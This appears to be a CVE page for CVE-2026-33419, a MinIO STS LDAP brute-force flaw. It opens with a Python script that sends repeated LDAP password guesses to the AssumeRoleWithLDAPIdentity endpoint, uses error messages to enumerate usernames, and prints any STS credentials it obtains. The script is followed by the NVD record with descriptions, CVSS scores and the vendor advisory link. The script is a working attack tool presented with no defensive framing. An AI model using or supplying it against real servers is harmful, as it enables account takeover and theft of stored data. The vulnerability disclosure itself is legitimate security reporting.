CVE-2026-33419

import requests import json # Target configuration target_url = "https://<minio-server>/minio/sts/AssumeRoleWithLDAPIdentity" ldap_user_base = "admin" password_file = "passwords.txt" # Headers headers = { "Content-Type": "application/x-www-form-urlencoded" } def brute_force(username, password): payload = { "Action": "AssumeRoleWithLDAPIdentity", "Version": "2011-06-15", "LDAPUsername": username, "LDAPPassword": password } try: response = requests.post(target_url, data=payload, headers=headers, timeout=5) # Check for successful credential usage (usually HTTP 200 and specific XML structure) if response.status_code == 200 and "AssumeRoleWithLDAPIdentityResult" in response.text: print(f"[+] Success! Username: {username}, Password: {password}") print(response.text) return True # Check for username enumeration patterns (e.g., specific error messages in response) # Note: Specific error parsing depends on MinIO version and response format elif "User does not exist" in response.text: print(f"[-] User not found: {username}") return False else: print(f"[*] Failed attempt: {username}:{password}") return False except Exception as e: print(f"[!] Error: {e}") return False # Example usage loop # with open(password_file, 'r') as f: # for pwd in f: # brute_force(ldap_user_base, pwd.strip())

{"cve": {"id": "CVE-2026-33419", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:29.900", "lastModified": "2026-04-08T19:00:39.203", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MinIO is a high-performance object storage system. Prior to RELEASE.2026-03-17T21-25-16Z, MinIO AIStor's STS (Security Token Service) AssumeRoleWithLDAPIdentity endpoint is vulnerable to LDAP credential brute-forcing due to two combined weaknesses: (1) distinguishable error responses that enable username enumeration, and (2) absence of rate limiting on authentication attempts. An unauthenticated network attacker can enumerate valid LDAP usernames and then perform unlimited password guessing to obtain temporary AWS-style STS credentials, gaining access to the victim's S3 buckets and objects. This issue has been patched in RELEASE.2026-03-17T21-25-16Z."}, {"lang": "es", "value": "MinIO es un sistema de almacenamiento de objetos de alto rendimiento. Antes de RELEASE.2026-03-17T21-25-16Z, el endpoint AssumeRoleWithLDAPIdentity del STS (Security Token Service) de MinIO AIStor es vulnerable a la fuerza bruta de credenciales LDAP debido a dos debilidades combinadas: (1) respuestas de error distinguibles que permiten la enumeración de nombres de usuario, y (2) la ausencia de limitación de velocidad en los intentos de autenticación. Un atacante de red no autenticado puede enumerar nombres de usuario LDAP válidos y luego realizar adivinanzas de contraseñas ilimitadas para obtener credenciales STS temporales de estilo AWS, obteniendo acceso a los buckets y objetos S3 de la víctima. Este problema ha sido parcheado en RELEASE.2026-03-17T21-25-16Z."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-204"}, {"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026-03-17t21-25-16z", "matchCriteriaId": "8CAFC450-D1D1-42B7-BD00-6BE994803768"}]}]}], "references": [{"url": "https://github.com/minio/minio/security/advisories/GHSA-jv87-32hw-hh99", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}